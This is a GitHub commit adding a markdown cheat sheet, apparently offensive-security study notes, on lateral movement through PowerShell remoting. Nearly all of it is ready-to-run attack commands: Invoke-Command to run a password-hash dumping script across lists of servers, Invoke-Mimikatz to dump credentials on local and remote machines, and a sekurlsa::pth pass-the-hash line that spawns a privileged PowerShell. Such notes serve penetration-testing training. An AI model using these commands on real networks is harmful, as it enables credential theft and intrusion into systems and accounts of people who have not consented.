Add files via upload

This commit is contained in:
ARZ 2021-12-07 17:43:08 +05:00 committed by GitHub
parent 394a6629aa
commit bbf04d3fbc
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,63 @@
# Lateral Movement - Powershell Remoting
## PSSession
- Interactive
- Runs in a new process (wsmprovhost)
- Is stateful (session is tracked)
## Useful cmdlets
```
New-PSSession -ComputerName computername.domainanme
Enter-PSSession -ComputerName computername.domainanme
```
We can use `-Credential` to pass username/password
### To execute commands or scriptblocks
```
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -Scriptblock {whoami;hostname} -ComputerName computername.domainname
```
### To execute scripts from files
```
Invoke-Command -FilePath C:\path\to\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_server>)
```
### Execute `Stateful` commands
```
$Sess = New-PSSession -ComputerName computername
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
```
## Mimikatz Powershell
Powershell script for mimikatz is used for dumping credentials ,tickets without dropping mimikatz exe to disk . It is used for passing , replaying hashes. Hashes can only be dumped with administrative privilieges
### Dump credentials on local machine
```
Invoke-Mimikatz -DumpCreds
```
### Dump credentials on multiple remote machines
```
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1","computer2")
```
### Generate tokens from hashes
```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:computername.domain.name /ntlm:ntlmhash /run:powershell.exe"'
```